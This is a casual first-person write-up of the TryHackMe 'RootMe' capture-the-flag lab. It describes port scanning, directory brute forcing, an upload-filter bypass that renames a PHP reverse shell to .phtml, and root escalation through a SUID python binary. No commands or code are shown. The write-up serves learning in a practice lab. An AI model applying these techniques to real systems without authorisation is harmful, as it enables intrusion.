Hello!
Today we’ll be saying our prayers to the second box I conquered on TryHackMe named RootMe, I present you an obituary. I began my mission with reconnaissance using the nmap tool, loaded with two options for default scripts and service versions running on open ports.
Here we have ports 80 and 22 open which is HTTP and SSH. HTTP, a communication protocol used across the internet, and SSH, or secure shell gives us a way to remotely log into our machines. Let’s visit our site shall we?
Perfect! We have a clear objective of what our task is so I felt I should begin with a directory/file brute forcing tool named Gobuster to see what else I could find while I was here. All that's needed is a wordlist to go along with the target address.
After sorting through the options I discovered an interesting find on /panel !
and /uploads !
This beautiful recipe brews up the perfect conditions to spawn a reverse shell through the /uploads path! A reverse shell is when you have a victim computer initiate a connection with an attacker computer. Why would we want this? Great question! Usually it’s to circumvent implemented firewall configurations set up against the attacker, by having the victim computer make an outbound connection to the attacker instead! Luckily our machine is equipped with a php reverse shell, all we have to do is navigate to /usr/share/webshells/php, edit “php-reverse-shell.php”, input our attack machine’s IP, followed by the port we want to listen on.
Ok perfect! Now that we edited our script we can upload it at the /panels location and get closer to spawning a reverse shell. Or so I thought…
To my detriment it seems .php extensions are prohibited from being uploaded on to the server! After some light googling I came across a solution for a file upload bypass, all I had to do was change the .php extension to .phtml and voila!
Awesome, we have successfully uploaded our shell! From here we move to the /uploads path, set up a listener on port 4444 on our machine, and then click on our file to get…
Our beautiful shell as www-data! The first thing I did was upgrade our dumbshell with python so I can use my arrow keys correctly and after some sniffing around I was able to find the user.txt flag!
From here we find a way to escalate our privileges to root so I decide to check for SUID, or set user ID. This lets me run files as the user ID of the owner instead of myself. This /bin/python path seems promising.. lets check gtfobins, which is a privilege escalation tool we can leverage to gain access using our specific instance.
This line seems the most promising!
There you go ladies and gents we have successfully achieved root user on this machine, thank you for attending this funeral.
